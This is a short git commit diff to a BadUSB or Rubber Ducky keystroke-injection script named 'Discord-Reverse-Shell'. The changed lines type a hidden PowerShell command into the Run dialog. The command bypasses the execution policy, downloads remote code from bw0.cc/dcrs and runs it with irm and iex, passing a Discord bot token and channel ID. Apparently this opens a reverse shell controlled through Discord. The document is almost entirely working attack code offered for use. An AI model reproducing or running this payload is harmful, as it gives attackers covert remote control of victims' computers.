Update Discord-Reverse-Shell.txt

This commit is contained in:
egieb
2025-06-18 15:06:11 +00:00
committed by GitHub
parent 2dd732d8d3
commit 8dca35a069

View File

@@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://bw0.cc/dcrs | iex
STRING powershell -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
ENTER